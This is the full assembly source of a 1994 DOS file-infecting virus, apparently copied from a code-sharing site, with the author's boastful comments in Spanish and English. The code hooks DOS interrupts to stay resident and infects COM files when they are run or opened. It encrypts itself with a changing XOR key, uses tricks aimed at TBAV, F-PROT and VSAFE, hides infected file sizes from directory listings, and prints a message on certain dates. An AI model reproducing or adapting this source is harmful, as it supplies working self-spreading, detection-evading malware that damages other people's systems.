📄 charly2.asm
字号:
;
; Virus Los Salieris de Charly II (para compilar normal).
; (Stealth with TBAV, VSAFE, DIR, NC and MEM)
;
; Created by: Ramthes Jones'94 (For Those About to Rock!!
; (AHORA SI QUE EL TBAV ME LA CHUPA BIEN!!!)
;
; Fuente de mierda! hasta donde pensas llegar? porque estos gatos
; solo hablan en ingles... grrr! desencriptan pero no traducen.
;
; DANGER!!: What you're gonna read could be bad for your health!
; Please! try to understand... my prgs don't run...
; they creep >:-D he he he!
;
CODE SEGMENT
.286c
ASSUME CS:CODE, DS:CODE, ES:CODE
ORG 100h
START:
JMP COMIENZO
NOP
NOP
NOP
INT 20h
COMIENZO:
ONE LABEL BYTE
INT 03h ; This piece o'shit's for TBAV :( :::
MOV BX,0107h
PUSH BX
MOV AH,0Dh ; ??? What?????????!
MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE)
MOV SI,(OFFSET DESDE_ACA - OFFSET ONE)
ADD SI,BX
DESENCRIPTO:
MOV DL,CS:[((NUMERO - OFFSET ONE) + BX)]
XOR [SI],DL
INC SI
XOR AH,AH ; This shit's for F-PROT
INT 02h ; This shit's for TBAV
LOOP DESENCRIPTO
JMP DESDE_ACA
INT 21h
MOV AX,4C00h
INT 21h
DESDE_ACA:
MOV AX,0CACAh
INT 21h
CMP AX,0FEDEh
JE CORRE_PROG_1
JMP CHUPAMELA
CORRE_PROG_1:
JMP CORRE_PROG
CHUPAMELA:
PUSH AX
PUSH DX
MOV AX,0FA01h
MOV DX,5945h
INT 21h
POP DX
POP AX
MOV AH,4Ah
XOR BX,BX
INT 21h
MOV AH,4Ah
MOV BX,0FFFFh
INT 21h
SUB BX,101h
MOV AH,4Ah
INT 21h
MOV AH,48h
MOV BX,100h
INT 21h
MOV ES,AX
PUSH ES
DEC AX
MOV ES,AX
MOV ES:WORD PTR [0001h], 0008h
POP ES
PUSH CS
POP DS
POP SI
PUSH SI
XOR DI,DI
MOV CX,OFFSET TWO - OFFSET ONE
CLD
REP MOVSB
PUSH ES
POP DS
MOV AX,3521h
INT 21h
POP SI
PUSH SI
MOV DS:[INT21IP - OFFSET ONE],BX
MOV DS:[INT21CS - OFFSET ONE],ES
MOV AX,2521h
MOV DX,(OFFSET HOOK_21 - OFFSET ONE)
INT 21h
MOV AH,04h
INT 1Ah
CMP DX,0526h
JE JODE_2
CMP DX,1126h
JE JODE_2
CMP DX,1021h
JE JODE_2
JMP NO_JODE
JODE_2:
MOV AX,3513h
INT 21h
MOV DS:[INT17IP - OFFSET ONE],BX
MOV DS:[INT17CS - OFFSET ONE],ES
MOV AX,2513h
MOV DX,(OFFSET HOOK_13 - OFFSET ONE)
INT 21h
NO_JODE:
PUSH CS
PUSH CS
POP DS
POP ES
CORRE_PROG:
POP BX
MOV DI,100h
LEA SI,[(NORMAL - OFFSET ONE) + BX]
MOVSW
MOVSB
PUSH CS
PUSH 0100h
RETF
HOOK_21 PROC FAR
PUSH DS
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CMP AX,0CACAh
JE RESIDE
CMP AH,4Bh
JE INFECTA1
CMP AH,3Dh
JE INFECT_FAST1
CMP AH,4Eh
JE NO_NC
CMP AH,4Fh
JE NO_NC
CMP AH, 11h
JE NO_DIR
CMP AH, 12h
JE NO_DIR
JMP FIN
INFECTA1: JMP INFECTA
INFECT_FAST1: JMP INFECT_FAST
RESIDE:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
MOV AX,0FEDEh
IRET
NO_DIR PROC
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
PUSH CX
PUSH BX
PUSH ES
PUSH AX
MOV AH,2Fh
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
POP AX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
PUSH AX
PUSHF
OR AL,AL
JNE FINHANDLER2
CMP BYTE PTR ES:[BX],0FFh
JNE NOEXTENDED
ADD BX,07h
NOEXTENDED:
MOV CX,ES:[BX+17h]
AND CL,00011111b
CMP CL,00001101b
JNE FINHANDLER2
SUB WORD PTR ES:[BX+1Dh],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG
SBB WORD PTR ES:[BX+1Fh],0
FINHANDLER2:
POPF
POP AX
POP ES
POP BX
POP CX
RETF 0002h
NO_DIR ENDP
NO_NC PROC
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH ES
MOV AH,2Fh
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CX,ES:[BX+16h]
AND CL,00011111b
CMP CL,00001101b
JE SI_RECUBRO
JMP NO_RECUBRO
SI_RECUBRO:
SUB WORD PTR ES:[BX+1Ah],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG
NO_RECUBRO:
POP ES
POP CX
POP BX
POP AX
POPF
RETF 2
NO_NC ENDP
FIN_1: JMP FIN
INFECT_FAST:
MOV SI,DX
BUCLE:
CMP BYTE PTR [SI],"."
JE YASTA
CMP BYTE PTR [SI],00h
JE FIN_1
INC SI
JMP BUCLE
YASTA:
PUSH SI
BUCLE2:
CMP BYTE PTR [SI],"\"
JE YASTA2
CMP SI,DX
JNE NOSTA2
DEC SI
JMP YASTA2
NOSTA2:
DEC SI
JMP BUCLE2
YASTA2:
INC SI
MOV AX,[SI]
OR AX,2020h
CMP AX,"oc"
JNE DALEPUES
INC SI
INC SI
MOV AX,[SI]
OR AX,2020h
CMP AX,"mm"
JNE DALEPUES
POP SI
JMP FIN_1
DALEPUES:
POP SI
INC SI
MOV AX,[SI]
OR AX,2020h
CMP AX,"oc"
JNE FIN_1
INFECTA:
PUSH AX
PUSH BX
PUSH DX
PUSH DS
PUSH ES
MOV AX, CS
MOV DS, AX
MOV AX,3524h
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
MOV DS:[INT24IP - OFFSET ONE],BX
MOV DS:[INT24CS - OFFSET ONE],ES
MOV AX,2524h
MOV DX,(OFFSET HOOK_24 - OFFSET ONE)
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
POP ES
POP DS
POP DX
POP BX
POP AX
PUSH DX
PUSH DX
CALL REMUEVE_BITS
POP DX
MOV AX,4300h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX
MOV AX,4301h
MOV CX,20h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL_1
MOV AX,3D02h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
PUSH AX
POP BX
MOV AH,3Fh
MOV CX,2
PUSH CS
POP DS
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
XOR SI,SI
MOV AL,CS:(NORMAL - OFFSET ONE)[SI]
CMP AL,'M'
JE FINAL_1
INC SI
MOV AL,CS:(NORMAL - OFFSET ONE)[SI]
CMP AL,'Z'
JE FINAL_1
JMP CONTI
FINAL_1:
JMP FINAL
CONTI:
MOV AX,5700h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(HORA - OFFSET ONE)],CX
MOV CS:[(FECHA - OFFSET ONE)],DX
AND CL,00011111b ; Esto es lo correcto para comprobar
CMP CL,00001101b ; si los segundos son 26
JE FINAL_1
MOV AX,4200h
CWD
MOV CX,DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AH,3Fh
MOV CX,3
PUSH CS
POP DS
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,4202h
CWD
MOV CX,DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
PUSH AX
SUB AX,3
MOV SI,1
MOV CS:(BUFFER - OFFSET ONE)[SI],AL
INC SI
MOV CS:(BUFFER - OFFSET ONE)[SI],AH
; PUSH AX ;MIERDA1
MOV AH,2Ch
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[NUMERO - OFFSET ONE],DL
PUSH BX
MOV AH,48h
MOV BX,150h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV ES,AX
POP BX
PUSH CS
POP DS
XOR SI,SI
MOV DI,SI
MOV CX,OFFSET TWO - OFFSET ONE
CLD
REP MOVSB
PUSH ES
POP DS
POP AX ;LL
INC AH
XOR SI,SI ;LL
MOV ES:[SI + 2],AL ;OPA
MOV ES:[SI + 3],AH
MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE)
MOV SI,(OFFSET DESDE_ACA - OFFSET ONE)
ENCRIPTO:
XOR [SI],DL
INC SI
LOOP ENCRIPTO
MOV AH,40h
MOV CX,OFFSET TWO - OFFSET ONE
XOR DX,DX
PUSH ES
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL
MOV AH,49h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,4200h
CWD
MOV CX,DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AH,40h
MOV CX,3
MOV DX,(OFFSET BUFFER - OFFSET ONE)
PUSH CS
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,5701h
MOV CX,CS:[(HORA - OFFSET ONE)]
AND CL,11100000b
OR CL,00001101b
MOV DX,CS:[(FECHA - OFFSET ONE)]
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
FINAL:
MOV AH,3Eh
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,4301h
MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)]
POP DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
CALL RESTAURA_BITS
MOV AX,2524h
MOV DX,CS:[INT24IP - OFFSET ONE]
MOV DS,CS:[INT24CS - OFFSET ONE]
PUSHF
CALL DWORD PTR CS:[INT21IP-OFFSET ONE]
FIN:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)]
HOOK_21 ENDP
HOOK_13 PROC
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH SI
XOR BX,BX
MOV SI,31
MOV CX,75
ESCRIBE:
MOV AH,0Eh
MOV AL,CS:(TEXTO - OFFSET ONE)[SI]
INT 10h
INC SI
LOOP ESCRIBE
POP SI
POP CX
POP BX
POP AX
POPF
JMP DWORD PTR CS:[(INT17IP - OFFSET ONE)]
HOOK_13 ENDP
HOOK_24 PROC
XOR AL,AL
IRET
HOOK_24 ENDP
V_SAFE PROC
MOV AH,0FAh
MOV DX,5945h
INT 21h
RET
V_SAFE ENDP
VERIFICA_RESIDENCIA PROC
XOR AL,AL
CALL V_SAFE
CMP BX,2F00h
JE FORI
STC
FORI: RET
VERIFICA_RESIDENCIA ENDP
REMUEVE_BITS PROC
CALL VERIFICA_RESIDENCIA
JC FORI_1
MOV AL,02h
MOV BL,00000000b
CALL V_SAFE
MOV CS:[SEBA-OFFSET ONE],CL
FORI_1:
CLC
RET
REMUEVE_BITS ENDP
RESTAURA_BITS PROC
CALL VERIFICA_RESIDENCIA
JC FORI_2
MOV AL,02
MOV BL,CS:[SEBA-OFFSET ONE]
CALL V_SAFE
FORI_2:
CLC
RET
RESTAURA_BITS ENDP
INT21IP DW 0
INT21CS DW 0
INT24IP DW 0
INT24CS DW 0
INT17IP DW 0
INT17CS DW 0
ATRIBUTOS DW 0
SEBA DB 1
HORA DW 0
FECHA DW 0
BUFFER DB 3 DUP(0E9h)
NORMAL DB 3 DUP(90h)
TEXTO DB "VIRUS LOS SALIERIS DE CHARLY 2."
DB "AIN'T A HACKER,"
DB "AIN'T A CRACKER,"
DB "I AM ONLY A MOTHERFUCKER."
DB 'DEDICATED TO "MACA"'
INCRIPT LABEL BYTE
NUMERO DB 1 DUP(0)
TWO LABEL BYTE
CODE ENDS
END START⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -